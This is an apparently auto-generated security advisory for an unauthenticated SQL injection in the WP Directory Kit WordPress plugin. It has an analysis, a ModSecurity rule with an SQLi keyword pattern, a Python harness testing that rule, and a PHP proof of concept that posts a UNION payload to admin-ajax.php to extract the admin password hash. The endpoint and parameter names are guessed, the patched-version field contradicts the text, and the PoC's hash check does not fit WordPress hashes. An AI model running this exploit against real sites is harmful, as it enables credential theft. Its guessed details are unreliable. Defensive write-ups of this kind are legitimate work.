Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 22, 2026

CVE-2026-42672: WP Directory Kit <= 1.5.1 – Unauthenticated SQL Injection (wpdirectorykit)

Severity: High (CVSS 7.5)
CWE: 89
Vulnerable Version: 1.5.1
Patched Version:
Disclosed: May 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42672 (metadata-based):
This is an unauthenticated SQL injection vulnerability in the WP Directory Kit plugin for WordPress, affecting versions up to and including 1.5.1. The CVSS score is 7.5 (High) with a vector string of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, indicating network exploitation without authentication or user interaction, and high impact on confidentiality. The vulnerability stems from insufficient escaping of a user-supplied parameter and the lack of prepared statements in a SQL query.

The root cause, inferred from the CWE-89 classification and vulnerability description, is improper neutralization of special elements in an SQL command. The plugin likely constructs SQL queries by concatenating user input directly, without using $wpdb->prepare() or similar parameterized query methods. The description explicitly states “insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query,” which Atomic Edge research interprets as the plugin failing to escape the parameter before interpolation into a SQL string. Without a code diff, we cannot confirm the exact vulnerable parameter or query, but typical WordPress SQLi patterns involve AJAX handlers or shortcode attributes that accept numeric or string values.

Exploitation requires sending a crafted HTTP request to a vulnerable WordPress installation. Based on the plugin slug ‘wpdirectorykit’ and common WordPress plugin architecture, the attack likely targets an AJAX action registered by the plugin, such as ‘wpdirectorykit_search’ or ‘wpdirectorykit_filter’, accessible via POST to /wp-admin/admin-ajax.php. An unauthenticated attacker can supply a malicious parameter (e.g., ‘search’, ‘id’, ‘category’) containing SQL injection payloads like ‘OR 1=1 UNION SELECT …’ to extract data from the database. The attacker does not need a valid nonce or capability check, as the vulnerability allows unauthenticated access. Since the plugin version is 1.5.1, the vulnerable endpoint may be present in any exposed front-end feature, such as listing or directory search.

Remediation requires the plugin developer to apply parameterized queries using WordPress’s $wpdb->prepare() method for all database operations involving user-supplied input. For each vulnerable query, the input must be treated as a placeholder (%s or %d) rather than concatenated into the SQL string. Additionally, input validation and escaping functions like esc_sql() should be used as a secondary defense. The fixed version 1.5.2 should sanitize and prepare the parameter before execution. Atomic Edge research recommends that administrators update the plugin to version 1.5.2 or later immediately.

If exploited, an unauthenticated attacker can extract sensitive information from the WordPress database, including user credentials (hashed passwords), email addresses, private post content, and other confidential data. The CVSS confidentiality impact is rated HIGH, and because no authentication or user interaction is required, the attack can be automated to target multiple sites. While the vulnerability does not directly allow privilege escalation or remote code execution according to the CVSS vector, it can facilitate further attacks by exposing session tokens or admin credentials, potentially leading to full site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-42672 (metadata-based)
# This rule blocks unauthenticated SQL injection attempts targeting the WP Directory Kit plugin's AJAX search handler.
# It matches the specific path and action, then inspects the 'search' parameter for common SQLi patterns.

# REQUEST_FILENAME excludes the query string, so the path match still holds when one is appended.
# The keywords in the pattern are lowercase because t:lowercase is applied before @rx runs.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42672 - Unauthenticated SQL Injection via WP Directory Kit AJAX',severity:'CRITICAL',tag:'CVE-2026-42672'"
  SecRule ARGS_POST:action "@streq wpdirectorykit_search" \
    "chain"
    SecRule ARGS_POST:search "@rx \b(?:union|select|insert|update|delete|drop|alter|create|or\s+\d+\s*=\s*\d*|'\s*or|--|#|\*/|\bsleep\b|\bbenchmark\b|\bload_file\b|\binto\s+outfile\b)" \
      "t:none,t:urlDecode,t:lowercase"

# Note: The rule uses a regex pattern targeting common SQL injection keywords.
# If the plugin uses a different parameter name or action, this rule should be adjusted.
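
Because t:lowercase runs before @rx, the case of the keywords in the pattern decides whether the rule can fire at all, and the bare keywords also catch ordinary directory searches. The following is an added example, not Atomic Edge's code: it approximates the rule's transformation pipeline in Python and runs the keyword alternation, with its regex escapes written out, over constructed sample values. The helper names and sample strings are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Keyword alternation of the rule, written with uppercase keywords.
UPPER = (r"\b(?:UNION|SELECT|INSERT|UPDATE|DELETE|DROP|ALTER|CREATE|"
         r"OR\s+\d+\s*=\s*\d*|'\s*OR|--|#|\*/|\bSLEEP\b|\bBENCHMARK\b|"
         r"\bLOAD_FILE\b|\bINTO\s+OUTFILE\b)")
# Same pattern with lowercase keywords (every regex escape in it is already lowercase).
LOWER = UPPER.lower()

def transform(value: str) -> str:
    """Approximation of t:none,t:urlDecode,t:lowercase on one argument value."""
    return unquote_plus(value).lower()

def rule_matches(pattern: str, value: str) -> bool:
    """True if the last SecRule in the chain would fire for this 'search' value."""
    return re.search(pattern, transform(value)) is not None

# Constructed sample values for ARGS_POST:search (not captured traffic).
SAMPLES = {
    "union_probe": "' UNION SELECT 1,2,3 -- ",
    "encoded_probe": "x%27%20UnIoN%20SeLeCt%201",
    "benign_plain": "dentist toronto",
    "benign_keyword": "select homes",
    "benign_hash": "suite#4 king street",
}

def evaluate(pattern: str) -> dict:
    """Map each sample name to whether the rule would block it."""
    return {name: rule_matches(pattern, value) for name, value in SAMPLES.items()}

if __name__ == "__main__":
    for label, pattern in (("uppercase keywords", UPPER), ("lowercase keywords", LOWER)):
        print(label)
        for name, blocked in evaluate(pattern).items():
            print(f"  {name:15} {'BLOCK' if blocked else 'pass'}")
```

With uppercase keywords the rule misses both probes and blocks only the benign value containing "#"; with lowercase keywords it blocks the probes but also "select homes", so run the rule in detection-only mode against real search traffic before enforcing it.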

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42672 - WP Directory Kit <= 1.5.1 - Unauthenticated SQL Injection

// This PoC targets the likely vulnerable AJAX endpoint.
// The exact action and parameter names are inferred from common plugin patterns.
// Adjust $target_url to the base URL of the WordPress installation.
// The payload extracts the admin user's password hash from the wp_users table.

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// Initialize cURL session
$ch = curl_init();

// The AJAX action is likely 'wpdirectorykit_search' or 'wpdirectorykit_filter'
// The vulnerable parameter may be 'search', 'keyword', 'id', or 'category'
// We use a UNION-based SQL injection to extract data
$post_data = [
    'action' => 'wpdirectorykit_search',
    'search' => "' UNION SELECT user_pass,user_login,user_email FROM wp_users WHERE user_login = 'admin' -- "
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded'
]);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "\n";
} else {
    // Display the raw response
    echo "Response from target:\n";
    echo $response . "\n\n";
    
    // Attempt to extract the password hash if the response contains data
    if (preg_match('/[a-f0-9]{32}/i', $response, $matches)) {
        echo "Potential password hash found: " . $matches[0] . "\n";
    }
}

curl_close($ch);
